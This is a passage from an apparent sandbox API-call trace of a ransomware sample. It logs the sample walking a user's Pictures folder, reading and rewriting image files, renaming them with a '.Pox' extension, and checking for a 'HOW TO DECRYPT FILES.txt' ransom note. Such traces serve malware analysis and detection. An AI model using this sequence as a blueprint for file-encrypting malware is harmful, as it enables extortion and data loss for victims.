out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51fda70, ftCreationTime.dwHighDateTime=0x1d4c99d, ftLastAccessTime.dwLowDateTime=0x267f3ed0, ftLastAccessTime.dwHighDateTime=0x1d4ca1e, ftLastWriteTime.dwLowDateTime=0x267f3ed0, ftLastWriteTime.dwHighDateTime=0x1d4ca1e, nFileSizeHigh=0x0, nFileSizeLow=0x1739c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TDyD6ro.png", cAlternateFileName="")) returned 1 [0040.527] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.527] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0040.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0040.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0040.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0040.527] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3", lpFilePart=0x0) returned 0x43 [0040.527] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\", lpFilePart=0x0) returned 0x44 [0040.527] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9ba3ff0, ftCreationTime.dwHighDateTime=0x1d4d3aa, ftLastAccessTime.dwLowDateTime=0x4b5ad090, ftLastAccessTime.dwHighDateTime=0x1d4cfda, ftLastWriteTime.dwLowDateTime=0x4b5ad090, ftLastWriteTime.dwHighDateTime=0x1d4cfda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0040.528] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9ba3ff0, ftCreationTime.dwHighDateTime=0x1d4d3aa, ftLastAccessTime.dwLowDateTime=0x4b5ad090, ftLastAccessTime.dwHighDateTime=0x1d4cfda, ftLastWriteTime.dwLowDateTime=0x4b5ad090, ftLastWriteTime.dwHighDateTime=0x1d4cfda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.528] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89686b0, ftCreationTime.dwHighDateTime=0x1d4d031, ftLastAccessTime.dwLowDateTime=0xfb1c9730, ftLastAccessTime.dwHighDateTime=0x1d4d489, ftLastWriteTime.dwLowDateTime=0xfb1c9730, ftLastWriteTime.dwHighDateTime=0x1d4d489, nFileSizeHigh=0x0, nFileSizeLow=0xfe99, dwReserved0=0x0, dwReserved1=0x0, cFileName="jjlE9sKEgSgYfe.gif", cAlternateFileName="JJLE9S~1.GIF")) returned 1 [0040.528] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cad5860, ftCreationTime.dwHighDateTime=0x1d4c761, ftLastAccessTime.dwLowDateTime=0xe35f2d60, ftLastAccessTime.dwHighDateTime=0x1d4cbe2, ftLastWriteTime.dwLowDateTime=0xe35f2d60, ftLastWriteTime.dwHighDateTime=0x1d4cbe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LXgD hT", cAlternateFileName="LXGDHT~1")) returned 1 [0040.529] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1a7ad0, ftCreationTime.dwHighDateTime=0x1d4d4be, ftLastAccessTime.dwLowDateTime=0xa4bcaa00, ftLastAccessTime.dwHighDateTime=0x1d4d598, ftLastWriteTime.dwLowDateTime=0xa4bcaa00, ftLastWriteTime.dwHighDateTime=0x1d4d598, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PkHSV- FwSU8Ry.png", cAlternateFileName="PKHSV-~1.PNG")) returned 1 [0040.529] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe883b240, ftCreationTime.dwHighDateTime=0x1d4cbae, ftLastAccessTime.dwLowDateTime=0x2dabd370, ftLastAccessTime.dwHighDateTime=0x1d4d3d4, ftLastWriteTime.dwLowDateTime=0x2dabd370, ftLastWriteTime.dwHighDateTime=0x1d4d3d4, nFileSizeHigh=0x0, nFileSizeLow=0x14ea3, dwReserved0=0x0, dwReserved1=0x0, cFileName="qy8DQkizNwG4c.jpg", cAlternateFileName="QY8DQK~1.JPG")) returned 1 [0040.529] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76092b0, ftCreationTime.dwHighDateTime=0x1d4c5b9, ftLastAccessTime.dwLowDateTime=0x9de4df60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x9de4df60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="s95FnDm 7mO2PYSi2", cAlternateFileName="S95FND~1")) returned 1 [0040.529] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51fda70, ftCreationTime.dwHighDateTime=0x1d4c99d, ftLastAccessTime.dwLowDateTime=0x267f3ed0, ftLastAccessTime.dwHighDateTime=0x1d4ca1e, ftLastWriteTime.dwLowDateTime=0x267f3ed0, ftLastWriteTime.dwHighDateTime=0x1d4ca1e, nFileSizeHigh=0x0, nFileSizeLow=0x1739c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TDyD6ro.png", cAlternateFileName="")) returned 1 [0040.529] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51fda70, ftCreationTime.dwHighDateTime=0x1d4c99d, ftLastAccessTime.dwLowDateTime=0x267f3ed0, ftLastAccessTime.dwHighDateTime=0x1d4ca1e, ftLastWriteTime.dwLowDateTime=0x267f3ed0, ftLastWriteTime.dwHighDateTime=0x1d4ca1e, nFileSizeHigh=0x0, nFileSizeLow=0x1739c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TDyD6ro.png", cAlternateFileName="")) returned 0 [0040.529] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0040.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0040.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0040.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png", lpFilePart=0x0) returned 0x56 [0040.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0040.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\pkhsv- fwsu8ry.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.530] GetFileType (hFile=0x26c) returned 0x1 [0040.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0040.530] GetFileType (hFile=0x26c) returned 0x1 [0040.530] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0xa5a0 [0040.530] ReadFile (in: hFile=0x26c, lpBuffer=0x2516ee8, nNumberOfBytesToRead=0xa5a0, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x2516ee8*, lpNumberOfBytesRead=0x3ae488*=0xa5a0, lpOverlapped=0x0) returned 1 [0040.531] CloseHandle (hObject=0x26c) returned 1 [0040.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.546] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png", lpFilePart=0x0) returned 0x56 [0040.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\pkhsv- fwsu8ry.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.549] GetFileType (hFile=0x26c) returned 0x1 [0040.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0040.549] GetFileType (hFile=0x26c) returned 0x1 [0040.549] WriteFile (in: hFile=0x26c, lpBuffer=0x2597940*, nNumberOfBytesToWrite=0xa5b0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x2597940*, lpNumberOfBytesWritten=0x3ae47c*=0xa5b0, lpOverlapped=0x0) returned 1 [0040.550] CloseHandle (hObject=0x26c) returned 1 [0040.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png", lpFilePart=0x0) returned 0x56 [0040.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png.Pox", lpFilePart=0x0) returned 0x5a [0040.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0040.552] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\pkhsv- fwsu8ry.png"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1a7ad0, ftCreationTime.dwHighDateTime=0x1d4d4be, ftLastAccessTime.dwLowDateTime=0xa4bcaa00, ftLastAccessTime.dwHighDateTime=0x1d4d598, ftLastWriteTime.dwLowDateTime=0x2a5b46e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xa5b0)) returned 1 [0040.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0040.552] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\pkhsv- fwsu8ry.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\PkHSV- FwSU8Ry.png.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\pkhsv- fwsu8ry.png.pox")) returned 1 [0040.552] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg", lpFilePart=0x0) returned 0x55 [0040.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0040.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\qy8dqkiznwg4c.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.552] GetFileType (hFile=0x26c) returned 0x1 [0040.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0040.553] GetFileType (hFile=0x26c) returned 0x1 [0040.553] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x14ea3 [0040.553] ReadFile (in: hFile=0x26c, lpBuffer=0x36dd250, nNumberOfBytesToRead=0x14ea3, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x36dd250*, lpNumberOfBytesRead=0x3ae488*=0x14ea3, lpOverlapped=0x0) returned 1 [0040.554] CloseHandle (hObject=0x26c) returned 1 [0040.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg", lpFilePart=0x0) returned 0x55 [0040.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\qy8dqkiznwg4c.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.605] GetFileType (hFile=0x26c) returned 0x1 [0040.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0040.605] GetFileType (hFile=0x26c) returned 0x1 [0040.605] WriteFile (in: hFile=0x26c, lpBuffer=0x3435530*, nNumberOfBytesToWrite=0x14eb0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x3435530*, lpNumberOfBytesWritten=0x3ae47c*=0x14eb0, lpOverlapped=0x0) returned 1 [0040.607] CloseHandle (hObject=0x26c) returned 1 [0040.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg", lpFilePart=0x0) returned 0x55 [0040.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg.Pox", lpFilePart=0x0) returned 0x59 [0040.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0040.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\qy8dqkiznwg4c.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe883b240, ftCreationTime.dwHighDateTime=0x1d4cbae, ftLastAccessTime.dwLowDateTime=0x2dabd370, ftLastAccessTime.dwHighDateTime=0x1d4d3d4, ftLastWriteTime.dwLowDateTime=0x2a626b00, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0)) returned 1 [0040.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0040.611] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\qy8dqkiznwg4c.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\qy8DQkizNwG4c.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\qy8dqkiznwg4c.jpg.pox")) returned 1 [0040.611] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png", lpFilePart=0x0) returned 0x4f [0040.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0040.611] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\tdyd6ro.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.611] GetFileType (hFile=0x26c) returned 0x1 [0040.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0040.611] GetFileType (hFile=0x26c) returned 0x1 [0040.611] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x1739c [0040.612] ReadFile (in: hFile=0x26c, lpBuffer=0x344a400, nNumberOfBytesToRead=0x1739c, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x344a400*, lpNumberOfBytesRead=0x3ae488*=0x1739c, lpOverlapped=0x0) returned 1 [0040.615] CloseHandle (hObject=0x26c) returned 1 [0040.631] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.632] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.632] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png", lpFilePart=0x0) returned 0x4f [0040.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\tdyd6ro.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.633] GetFileType (hFile=0x26c) returned 0x1 [0040.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0040.633] GetFileType (hFile=0x26c) returned 0x1 [0040.633] WriteFile (in: hFile=0x26c, lpBuffer=0x34be658*, nNumberOfBytesToWrite=0x173a0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x34be658*, lpNumberOfBytesWritten=0x3ae47c*=0x173a0, lpOverlapped=0x0) returned 1 [0040.635] CloseHandle (hObject=0x26c) returned 1 [0040.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png", lpFilePart=0x0) returned 0x4f [0040.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png.Pox", lpFilePart=0x0) returned 0x53 [0040.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0040.637] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 